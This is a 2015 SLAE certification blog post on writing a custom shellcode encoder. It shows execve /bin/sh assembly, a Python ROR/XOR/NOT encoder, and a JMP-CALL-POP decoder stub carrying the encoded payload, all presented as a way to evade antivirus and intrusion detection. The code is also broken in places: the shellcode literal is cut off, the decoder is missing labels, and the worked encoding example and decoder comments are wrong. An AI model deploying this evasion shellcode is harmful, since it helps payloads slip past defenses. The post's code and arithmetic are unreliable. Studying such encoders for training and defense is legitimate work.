Monday, 10 August 2015

SLAE Assignment #4: Custom Encoder

For my SLAE (Securitytube Linux Assembly Expert) certification exam, I have to blog my 7 assignments. Below is the fourth exercise requested about writing a custom encoder shellcode. Code can be found at my GitHub SLAE repository.

Plain or clear shellcode can be detected easily by Antivirus and Intrusion Detection Systems. Indeed, they just have to make a signature of the shellcode, and it will be detected without much effort. One strategy to avoid that is to encode the shellcode, so that the resulting opcodes have no meaning at all. Of course to make it runable, a decoder stub has to be prepended and decode the shellcode at runtime, and jump to it.

I looked at various assembly instructions to make a decoder, one famous being XOR. However, I wanted to chain multiple instructions as to not make the encoding too close to known encoding schemes such as XOR. After looking into it, I went for the combination of ROR, XOR, and NOT. The three are bitwize instructions, ROR will rotate the bits by 7 to the right (= ROL 1), XOR will be applied with a key to encode the shellcode further, and then NOT will finally invert each byte. As an example: \x0D (ROR 7) = \x3B (XOR \xAA) = \x91 (NOT) = \x6E. So \x0D becomes \x6E at the end of the encoding. Below, let's start with the original shellcode, that will be later encoded. This is a simple Execve /bin/sh shellcode.

All comments are on the code. Available also on GitHub:

; Title: Execve stack (25 bytes)
; From SLAE course
; SLAE-681

global _start

section .text

 ;    ebx            ecx      edx
 ; [/bin/sh][NULL][&/bin/sh][NULL]

 ; 1 [NULL]
 xor eax, eax
 push eax  ; push NULL on the stack, before pushing a string

 ; 2 [&/bin/sh][NULL]
 ; PUSH //bin/sh (8 bytes) 68732f6e 69622f2f
 push 0x68732f6e
 push 0x69622f2f

 mov ebx, esp  ; ebx = //bin/sh NULL

 ; 3 [NULL][&/bin/sh][NULL]
 push eax
 mov edx, esp  ;  edx = NULL

 push ebx
 mov ecx, esp  ; ecx = &//bin/sh

 mov al, 11  ; execve syscall
 int 0x80
Then we compile and build it, checking it works:

It works as expected as we have a /bin/sh shell opened, now it's time to make an encoder. I have made a ROR/XOR/NOT encoder in python, which has to be opened to put the shellcode inside, before execution of the python program:


# Title: ROR/XOR/NOT encoder
# File:
# Author: Guillaume Kaddouch
# SLAE-681

import sys

ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

shellcode = (

encoded = ""
encoded2 = ""

print "[*] Encoding shellcode..."

for x in bytearray(shellcode):
    # ROR & XOR encoding
    z = ror(x, 7, 8)^0xAA

    # NOT encoding
    y = ~z

    if str('%02x' % (y & 0xff)).upper() == "00":
        print ">>>>>>>>>> NULL detected in shellcode, aborting."

    if str('%02x' % (y & 0xff)).upper() == "0A":
        print ">>>>>>>>>>  \\xOA detected in shellcode."

    if str('%02x' % (y & 0xff)).upper() == "0D":
        print ">>>>>>>>>>> \\x0D detected in shellcode."

    encoded += '\\x'
    encoded += '%02x' % (y & 0xff)

    encoded2 += '0x'
    encoded2 += '%02x,' %(y & 0xff)

print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)

We can now execute this python program to encode our shellcode, and display it on screen:

So original shellcode was:

Encoded shellcode becomes:

Now it's time to write a decoder shellcode, a decoder stub that will be launched first, to then decode the execve shellcode:

; Title:  Execve ROR XOR NOT decoder shellcode
; File: execve-rorxornotencoded.asm
; Author: Guillaume Kaddouch
; SLAE-681

global _start

section .text


 jmp short get_address ; JMP CALL POP method to get "encoded" address


 pop esi     ; retrieve encoded shellcode address
 xor ecx, ecx
 mov cl, len    ; set the counter to encoded shellcode length

decoder:   ; decoding of ROR/XOR/NOT starts end and decodes backward
 not byte [esi]   ; NOT current byte
 xor byte [esi], 0xAA  ; XOR 0xaa
 rol byte [esi], 7  ; ROL 7: rotate left 7 bytes
 inc esi
 loop decoder   ; loop until ecx = 0
 jmp short encoded  ; ecx = 0, jump to now decoded shellcode

 call shellcode
 encoded: db 0x37,0xd4,0xf5,0x85,0x89,0x0b,0xb3,0x85,0x85,0x0b,0x0b,0x91,0x87,0x46,0x92,0xf5,0x46,0x90,0xf3,0x46,0x96,0x34,0x43,0xce,0x54 
 len equ $-encoded:
The encoded execve /bin/sh shellcode has been included at the end of the shellcode, in the "encoded" variable. The decoder stub loops byte by byte to decode it, and then jump to it. Let's compile it and see if it works:

Then running the final program:

We can see that our encoded execve /bin/sh is correctly decoded and executed. There is a lot of possibilities to make encoders, and I think that combining 3 instructions is not a bad idea, even if the final size is 50 bytes (against 25 bytes unencoded). If size is an issue for a particular exploit, it is possible to use a single encoding instruction such as INC, provided the original shellcode has no \xFF byte. Finally, now Antivirus and IDS have adapated and are able to fingerprint decoder stubs. We will talk about solutions in other assignments.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-681

No comments:

Post a Comment